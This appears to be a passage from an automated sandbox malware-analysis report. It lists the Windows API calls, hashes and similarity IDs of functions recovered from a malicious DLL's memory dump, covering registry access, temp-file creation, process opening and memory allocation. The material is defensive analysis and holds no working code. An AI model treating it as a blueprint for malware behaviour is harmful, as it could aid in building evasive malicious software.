                • Instruction Fuzzy Hash: 7F316BB1901208BFEF109FA6DD49BAE7BF9EB44315F204154F910EB290E3789E95DB24
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,046CA2D4,00000008,00000001,00000010,00000001,00000000,0000003A,00000001,?), ref: 046DC776
                • WriteFile.KERNEL32(00000001,00000001,?,?,?), ref: 046DC7AA
                • ReadFile.KERNEL32(00000001,00000001,?,?,?), ref: 046DC7B2
                • GetLastError.KERNEL32 ref: 046DC7BC
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 046DC7D8
                • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 046DC7F1
                • CancelIo.KERNEL32(?), ref: 046DC806
                • CloseHandle.KERNEL32(?), ref: 046DC816
                • GetLastError.KERNEL32 ref: 046DC81E
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                • String ID:
                • API String ID: 4263211335-0
                • Opcode ID: 844d53022a769efab28228a7ea68e0067a76b1fbf22c7338b6fbdda2c5f2f02d
                • Instruction ID: fafd61d044bbac4758cc78e32b468f3cac6a42672acd2690f62102febbdf1bd6
                • Opcode Fuzzy Hash: 844d53022a769efab28228a7ea68e0067a76b1fbf22c7338b6fbdda2c5f2f02d
                • Instruction Fuzzy Hash: 83213B7290011CAFDB11AFA9D8489EE7BB9FB48351F008426F916D7240E774AA41CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,046DE92B,00000000,74E5F5B0,046D47CC,?,00000001), ref: 046DECB7
                • _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 046DECCD
                • _snwprintf.NTDLL ref: 046DECF2
                • CreateFileMappingW.KERNEL32(000000FF,046EE268,00000004,00000000,00001000,?), ref: 046DED0E
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 046DED20
                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 046DED37
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 046DED58
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 046DED60
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                • String ID:
                • API String ID: 1814172918-0
                • Opcode ID: a6d7d12239d5e9e6ff54650034220e80a40fc71c0280925e9c5fbe5ee70334d3
                • Instruction ID: 455135c3c34561399a3ba2d4b93bf631e54fc9aaeb9d86f0b09cd52c0c7efddf
                • Opcode Fuzzy Hash: a6d7d12239d5e9e6ff54650034220e80a40fc71c0280925e9c5fbe5ee70334d3
                • Instruction Fuzzy Hash: D5210576A41208BBD721AF55CC04F9D37E9EB94710F200026F606EF290FA71A9018B60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlenW.KERNEL32(00000000,?,04C99A03,?,?,04C99A03,?,?,04C99A03,?,?,04C99A03,?,00000000,00000000,00000000), ref: 046D826E
                • lstrcpyW.KERNEL32(00000000,?), ref: 046D8291
                • lstrcatW.KERNEL32(00000000,00000000), ref: 046D8299
                • lstrlenW.KERNEL32(00000000,?,04C99A03,?,?,04C99A03,?,?,04C99A03,?,?,04C99A03,?,?,04C99A03,?), ref: 046D82E4
                • memcpy.NTDLL(00000000,?,00000008,00000006), ref: 046D834C
                • LocalFree.KERNEL32(?,00000006), ref: 046D8363
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
                • String ID: P
                • API String ID: 3649579052-3110715001
                • Opcode ID: 0a686e8deb1a88fabbd35598e9e43d346625d6a089462034a091c381ffaf6f7f
                • Instruction ID: deab2f22ccfca48ac95ac95c4abdf6321374e1176e35eea7e6bee2634dcda4be
                • Opcode Fuzzy Hash: 0a686e8deb1a88fabbd35598e9e43d346625d6a089462034a091c381ffaf6f7f
                • Instruction Fuzzy Hash: D9615C71E0020AEFDF10EFA5DC88DAE7BB9EB44344B055029E519AB211F735E945CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046C7A3C: InterlockedIncrement.KERNEL32(?), ref: 046C7A8D
                  • Part of subcall function 046C7A3C: RtlLeaveCriticalSection.NTDLL(04C9C148), ref: 046C7B18
                • OpenProcess.KERNEL32(00000410,?,?,?,00000000,?,0000001C), ref: 046CED64
                • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,00000000,?,0000001C), ref: 046CED82
                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 046CEDE8
                • lstrlenW.KERNEL32(?), ref: 046CEE5D
                • GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 046CEE79
                • memcpy.NTDLL(00000014,?,00000002), ref: 046CEE91
                  • Part of subcall function 046C56F4: RtlLeaveCriticalSection.NTDLL(00000000), ref: 046C5771
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
                • String ID: o
                • API String ID: 2541713525-252678980
                • Opcode ID: 9c231f9bb93eae95a192dce8e76cce03f4d3bd4e8cb5c75466ee7ef46e7bc83b
                • Instruction ID: 612d3a93e966874a82cc063e7a6d104e0e46fe81b424433d9cfd0e2890331635
                • Opcode Fuzzy Hash: 9c231f9bb93eae95a192dce8e76cce03f4d3bd4e8cb5c75466ee7ef46e7bc83b
                • Instruction Fuzzy Hash: E45179B1640606EFE720DF65C888BAAB7F8FB18744F04452DE9059B250F775F9848B94
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046CD0E6: RegCreateKeyA.ADVAPI32(80000001,04C9B7F0,?), ref: 046CD0FB
                  • Part of subcall function 046CD0E6: lstrlen.KERNEL32(04C9B7F0,00000000,00000000,046ED06E,?,?,?,046C902F,00000001,?), ref: 046CD124
                • RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 046DB8E2
                • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 046DB8FA
                • HeapFree.KERNEL32(00000000,?,?,?,?,046C140C,?), ref: 046DB95C
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046DB970
                • WaitForSingleObject.KERNEL32(00000000,?,?,?,046C140C,?), ref: 046DB9C2
                • HeapFree.KERNEL32(00000000,?,?,?,?,046C140C,?), ref: 046DB9EB
                • HeapFree.KERNEL32(00000000,?,?,?,?,046C140C,?), ref: 046DB9FB
                • RegCloseKey.ADVAPI32(?,?,?,?,046C140C,?), ref: 046DBA04
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
                • String ID:
                • API String ID: 3503961013-0
                • Opcode ID: 3390f996f2ae5ef4b927817b1b0579f5b3f260e5c68204f57f07a9abe76eef47
                • Instruction ID: e7e2c1cc0cf56375a250ce8dd0f279fc3dd03610c6e6ac30a048c4eefcd3aa51
                • Opcode Fuzzy Hash: 3390f996f2ae5ef4b927817b1b0579f5b3f260e5c68204f57f07a9abe76eef47
                • Instruction Fuzzy Hash: 224104B5C00209EFDF019F96DC848EEBBB9FB08344F10446AE510AA214E3356E95EF60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,046C6410), ref: 046CE3BA
                • wsprintfA.USER32 ref: 046CE3E2
                • lstrlen.KERNEL32(?), ref: 046CE3F1
                  • Part of subcall function 046C57E0: RtlFreeHeap.NTDLL(00000000,?,046C222D,?,?,?,?,?,?,?,?,046C1089,?,?,?), ref: 046C57EC
                • wsprintfA.USER32 ref: 046CE431
                • wsprintfA.USER32 ref: 046CE466
                • memcpy.NTDLL(00000000,?,?), ref: 046CE473
                • memcpy.NTDLL(00000008,046E83F8,00000002,00000000,?,?), ref: 046CE488
                • wsprintfA.USER32 ref: 046CE4AB
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                • String ID:
                • API String ID: 2937943280-0
                • Opcode ID: c2fc0703281981f4d3d911bef56abca7762b4357c72ffb366412cad9f43a2339
                • Instruction ID: 789bce4897be07f27340d86f549f0bb6fe4524622dbb45a1f4af8daca106f486
                • Opcode Fuzzy Hash: c2fc0703281981f4d3d911bef56abca7762b4357c72ffb366412cad9f43a2339
                • Instruction Fuzzy Hash: 47411D75A0020AEFDB14DFA9C984DAAB7F8EF44308B148469E919D7211FB35FE058B64
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,046D219F,?,?,?,?), ref: 046D8ED4
                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 046D8EE6
                • wcstombs.NTDLL ref: 046D8EF4
                • lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,046D219F,?,?,?), ref: 046D8F18
                • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 046D8F2D
                • mbstowcs.NTDLL ref: 046D8F3A
                • HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,046D219F,?,?,?,?,?), ref: 046D8F4C
                • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,046D219F,?,?,?,?,?), ref: 046D8F66
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                • String ID:
                • API String ID: 316328430-0
                • Opcode ID: bfdd2f06d461f6d63168e3777e830312dfc1b4a616b69496027624b66aefd895
                • Instruction ID: 6a722394563f2111a18eddc9c688c1de410964e2e3b8a9e4bfe848c9729e68f4
                • Opcode Fuzzy Hash: bfdd2f06d461f6d63168e3777e830312dfc1b4a616b69496027624b66aefd895
                • Instruction Fuzzy Hash: 75213A31900209FFDF10AFA6EC08F9A7FB9EB54344F104125BA15A7160E7759E65DF60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • OpenProcess.KERNEL32(00000040,00000000,?), ref: 046C2733
                • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 046C2751
                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 046C2759
                • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 046C2777
                • GetLastError.KERNEL32 ref: 046C278B
                • RegCloseKey.ADVAPI32(?), ref: 046C2796
                • CloseHandle.KERNEL32(00000000), ref: 046C279D
                • GetLastError.KERNEL32 ref: 046C27A5
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                • String ID:
                • API String ID: 3822162776-0
                • Opcode ID: 9e452e16e66f70cb08c3945aab5d44a5dc2b4021d4b4b6b235bb73de66f1706a
                • Instruction ID: 50febf02200c7c22d9112f039cabc7bcc1ee7966e84539075ff56ccfc30fcbdb
                • Opcode Fuzzy Hash: 9e452e16e66f70cb08c3945aab5d44a5dc2b4021d4b4b6b235bb73de66f1706a
                • Instruction Fuzzy Hash: 4A115E79240205EFDB015F51D898B6A3BA9EB48361F109025FD06CB240FB75DD11DB71
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: e14977d6e37f76aa20090f899f0dbb054d331d294811bfac704e2e0dc11fa6ac
                • Instruction ID: f9edcc946ed0afb33aa41707924203e597c589681d442a9d050e2a7db404f03e
                • Opcode Fuzzy Hash: e14977d6e37f76aa20090f899f0dbb054d331d294811bfac704e2e0dc11fa6ac
                • Instruction Fuzzy Hash: A1B10471D0021AEFDF21AFA5CC08AFEBBB5EF14356F044069E800B6260E335AA55DF95
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCommandLineA.KERNEL32(046EA5D0,00000038,046DE924,00000000,74E5F5B0,046D47CC,?,00000001,?,?,?,?,?,?,?,046C8D64), ref: 046D9298
                • StrChrA.SHLWAPI(00000000,00000020,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D92A9
                  • Part of subcall function 046DED70: lstrlen.KERNEL32(00000000,7673D3B0,?,00000000,046C32A8,00000000,74E5F710,00000000,00000000), ref: 046DED79
                  • Part of subcall function 046DED70: memcpy.NTDLL(00000000,?,00000000,00000001), ref: 046DED9C
                  • Part of subcall function 046DED70: memset.NTDLL ref: 046DEDAB
                • ExitProcess.KERNEL32 ref: 046D948B
                  • Part of subcall function 046E2ADA: StrChrA.SHLWAPI(00000020,?,7673D3B0,04C9C0D4,00000000,?,046E321D,?), ref: 046E2AFF
                  • Part of subcall function 046E2ADA: StrTrimA.SHLWAPI(00000020,046EA4A4,00000000,?,046E321D,?), ref: 046E2B1E
                  • Part of subcall function 046E2ADA: StrChrA.SHLWAPI(00000020,?,?,046E321D,?), ref: 046E2B2A
                • lstrcmp.KERNEL32(?,?), ref: 046D9317
                • VirtualAlloc.KERNEL32(00000000,0000FFFF,00001000,00000040,?,?,?,?,?,?,?,046C8D64,?), ref: 046D932F
                  • Part of subcall function 046D05BB: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,04C9B7F0,?,?,046CD134,0000003A,04C9B7F0,?,?,?,046C902F,00000001,?), ref: 046D05FB
                  • Part of subcall function 046D05BB: CloseHandle.KERNEL32(000000FF,?,?,046CD134,0000003A,04C9B7F0,?,?,?,046C902F,00000001,?), ref: 046D0606
                • VirtualFree.KERNEL32(?,00000000,00008000,0000004B,00000000,00000000,-00000020,?,?,?,?,?,?,?,046C8D64,?), ref: 046D93A1
                • lstrcmp.KERNEL32(?,?), ref: 046D93BA
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Virtuallstrcmp$AllocCloseCommandErrorExitFreeHandleLastLineProcessTrimlstrlenmemcpymemset
                • String ID:
                • API String ID: 739714153-0
                • Opcode ID: f0b3fdf1594588e788bf93777bf62cd34fb3ed6dab50e16170af0ab8667e178b
                • Instruction ID: 98b231d1030983c726c5e2ad8da5968caf8e9a54b99be50e08fe8d80b7dbcc8b
                • Opcode Fuzzy Hash: f0b3fdf1594588e788bf93777bf62cd34fb3ed6dab50e16170af0ab8667e178b
                • Instruction Fuzzy Hash: 59513EB1D00219AFDF10AFA1CC88AEE7BB9EF18704F144419E501EA151FB75B945CB64
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 046D907D
                • StrTrimA.SHLWAPI(00000000,?), ref: 046D909A
                • HeapFree.KERNEL32(00000000,00000000), ref: 046D90CD
                • RtlImageNtHeader.NTDLL(00000000), ref: 046D90F6
                • HeapFree.KERNEL32(00000000,00000000,00000001,00000000,00000000), ref: 046D91B8
                  • Part of subcall function 046DED70: lstrlen.KERNEL32(00000000,7673D3B0,?,00000000,046C32A8,00000000,74E5F710,00000000,00000000), ref: 046DED79
                  • Part of subcall function 046DED70: memcpy.NTDLL(00000000,?,00000000,00000001), ref: 046DED9C
                  • Part of subcall function 046DED70: memset.NTDLL ref: 046DEDAB
                • lstrlen.KERNEL32(00000000,00000000,0000014C,00000000,00000000), ref: 046D9169
                • HeapFree.KERNEL32(00000000,00000000,00000000,0000014C,00000000,00000000), ref: 046D9198
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
                • String ID:
                • API String ID: 239510280-0
                • Opcode ID: 65d1d0fbf08435f4c405866b0fb80a2b04370e09b943012653a4c4e7497adc89
                • Instruction ID: 852bad196855b899d4a39da9c4c58a21f4951ca901779b029c66630fe5f2017b
                • Opcode Fuzzy Hash: 65d1d0fbf08435f4c405866b0fb80a2b04370e09b943012653a4c4e7497adc89
                • Instruction Fuzzy Hash: B941D571B40205FFEB219B55DC48FAE7BB9EB48744F100029F505AB290FB76AE49DB50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,046CCFAC,?,?,?,?,?), ref: 046E343A
                • lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,046CCFAC,?,?,?,?,?), ref: 046E3458
                • RtlAllocateHeap.NTDLL(00000000,74E06985,?), ref: 046E3481
                • memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,046CCFAC,?,?,?,?,?), ref: 046E3498
                • HeapFree.KERNEL32(00000000,00000000), ref: 046E34AB
                • memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,046CCFAC,?,?,?,?,?), ref: 046E34BA
                • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,046CCFAC,?,?,?,?,?), ref: 046E351E
                  • Part of subcall function 046C56F4: RtlLeaveCriticalSection.NTDLL(00000000), ref: 046C5771
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
                • String ID:
                • API String ID: 1635816815-0
                • Opcode ID: 17d65cbd83c60c01aaebe952dbdb83674a6525483018922204f9f1389fbacd81
                • Instruction ID: 7f3c3d982f08ca4716197a0e384728d2f36c5884c77567c359e3abe7a12d276b
                • Opcode Fuzzy Hash: 17d65cbd83c60c01aaebe952dbdb83674a6525483018922204f9f1389fbacd81
                • Instruction Fuzzy Hash: 2D417371901318EFDB229FA6CC44BAE7BE4EF14354F044068EC05AB350E771AD94DB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCurrentThreadId.KERNEL32 ref: 046E386B
                • GetWindowThreadProcessId.USER32(00000000,?), ref: 046E3899
                • GetWindowThreadProcessId.USER32(?,?), ref: 046E38DE
                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 046E3906
                • _strupr.NTDLL ref: 046E3931
                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 046E393E
                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 046E3958
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ProcessThread$Window$CloseCurrentHandleOpen_struprlstrlen
                • String ID:
                • API String ID: 3831658075-0
                • Opcode ID: 27d719a1a1380fc30ee8bbc472b44913990ec08663961312b08ca52f16091c28
                • Instruction ID: 7636825507d02c5d292530d104dff8eda0739b057647872372e51810f5d49feb
                • Opcode Fuzzy Hash: 27d719a1a1380fc30ee8bbc472b44913990ec08663961312b08ca52f16091c28
                • Instruction Fuzzy Hash: 03410D71D01219EFDF219FA6CC45BEEBBF9EB54701F14405AEA00A7250E7759A80CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlImageNtHeader.NTDLL ref: 046CAC2E
                • RtlEnterCriticalSection.NTDLL(00000000), ref: 046CAC71
                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 046CAC8C
                • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 046CACE2
                • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 046CAD3D
                • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 046CAD4B
                • RtlLeaveCriticalSection.NTDLL(00000000), ref: 046CAD56
                  • Part of subcall function 046C2237: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 046C224B
                  • Part of subcall function 046C2237: memcpy.NTDLL(00000000,046D153B,?,?,-00000005,?,046D153B,00000001,00000000,-00000005,00000001), ref: 046C2274
                  • Part of subcall function 046C2237: RegCloseKey.ADVAPI32(?,?,046D153B,00000001,00000000,-00000005,00000001), ref: 046C22C8
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenmemcpy
                • String ID:
                • API String ID: 2070110485-0
                • Opcode ID: e4608bef2dbc7ead41ddf3757c3d78d753bee4425648a6fedea1c24aed1b10ab
                • Instruction ID: 96533fdf91a1d012a663e2aa48d232354eb51b84df2dfad2fb97ff53bed7b3a6
                • Opcode Fuzzy Hash: e4608bef2dbc7ead41ddf3757c3d78d753bee4425648a6fedea1c24aed1b10ab
                • Instruction Fuzzy Hash: AD416EB220020AAFEB219FA6D848F7A37EDEB50745F040029F9059B251FB75ED41DB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • InterlockedIncrement.KERNEL32(046EE0EC), ref: 046DAF4B
                • lstrcpy.KERNEL32(00000000), ref: 046DAF87
                  • Part of subcall function 046C1B8A: lstrlen.KERNEL32(?,00000008,00000000,?,00000000,046DDB18,?,?,00000000,046CC692,?,?,?,?,00000000,?), ref: 046C1B99
                  • Part of subcall function 046C1B8A: mbstowcs.NTDLL ref: 046C1BB5
                • GetLastError.KERNEL32(00000000), ref: 046DB016
                • HeapFree.KERNEL32(00000000,?), ref: 046DB02D
                • InterlockedDecrement.KERNEL32(046EE0EC), ref: 046DB044
                • DeleteFileA.KERNEL32(00000000), ref: 046DB065
                • HeapFree.KERNEL32(00000000,00000000), ref: 046DB075
                  • Part of subcall function 046D0D54: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74E05520,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D66
                  • Part of subcall function 046D0D54: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D7F
                  • Part of subcall function 046D0D54: GetCurrentThreadId.KERNEL32 ref: 046D0D8C
                  • Part of subcall function 046D0D54: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D98
                  • Part of subcall function 046D0D54: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0DA6
                  • Part of subcall function 046D0D54: lstrcpy.KERNEL32(00000000), ref: 046D0DC8
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
                • String ID:
                • API String ID: 908044853-0
                • Opcode ID: 5252b2def555c34f0bf276d54b8f5c4d9379a62f70553e8689547533ada5b1ac
                • Instruction ID: 7aaf7a5905f64678e59b52e68638e62e7d57f1fa6bdfcaf70b51b1a834c9e753
                • Opcode Fuzzy Hash: 5252b2def555c34f0bf276d54b8f5c4d9379a62f70553e8689547533ada5b1ac
                • Instruction Fuzzy Hash: DE31C532D00114EBDB21AFA2D848AAD7AF4EB48B45F114069F914AB250F775AE41DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL(00000000,046DF266,00000000), ref: 046CC4CD
                • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 046CC4E2
                • memset.NTDLL ref: 046CC4EF
                • HeapFree.KERNEL32(00000000,00000000,?,046DF265,?,?,00000000,?,00000000,046CFB8A,?,00000000), ref: 046CC50C
                • memcpy.NTDLL(?,?,046DF265,?,046DF265,?,?,00000000,?,00000000,046CFB8A,?,00000000), ref: 046CC52D
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Allocate$Freememcpymemset
                • String ID: chun
                • API String ID: 2362494589-3058818181
                • Opcode ID: e128ee85fa5a30bcaeb511ff71d5236f5f78d058d08ccce6f946ebc27cf3735e
                • Instruction ID: bc5ebb690bbf629c1d3c0a766e5566ff18d1231d4fc70143a2c2f41215a6c0dd
                • Opcode Fuzzy Hash: e128ee85fa5a30bcaeb511ff71d5236f5f78d058d08ccce6f946ebc27cf3735e
                • Instruction Fuzzy Hash: 20316B71600706AFE720DF6AD844A66BBE8EF58314F41442EE949CB620F771FD25CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046D0D54: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74E05520,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D66
                  • Part of subcall function 046D0D54: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D7F
                  • Part of subcall function 046D0D54: GetCurrentThreadId.KERNEL32 ref: 046D0D8C
                  • Part of subcall function 046D0D54: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D98
                  • Part of subcall function 046D0D54: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0DA6
                  • Part of subcall function 046D0D54: lstrcpy.KERNEL32(00000000), ref: 046D0DC8
                • lstrlen.KERNEL32(00000000,00000000,00000F00,00000000), ref: 046CD883
                  • Part of subcall function 046DFCD1: lstrlen.KERNEL32(00000000,74E5F730,-00000001,00000000,?,?,?,046CD8A7,?,00000000,000000FF), ref: 046DFCE2
                  • Part of subcall function 046DFCD1: lstrlen.KERNEL32(?,?,?,?,046CD8A7,?,00000000,000000FF), ref: 046DFCE9
                  • Part of subcall function 046DFCD1: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 046DFCFB
                  • Part of subcall function 046DFCD1: _snprintf.NTDLL ref: 046DFD21
                  • Part of subcall function 046DFCD1: _snprintf.NTDLL ref: 046DFD55
                  • Part of subcall function 046DFCD1: HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,000000FF), ref: 046DFD72
                • StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,00000000,?,00000000,000000FF), ref: 046CD91D
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,000000FF), ref: 046CD93A
                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,000000FF), ref: 046CD942
                • HeapFree.KERNEL32(00000000,00000000,?,00000000,000000FF), ref: 046CD951
                Strings
                Memory Dump Source
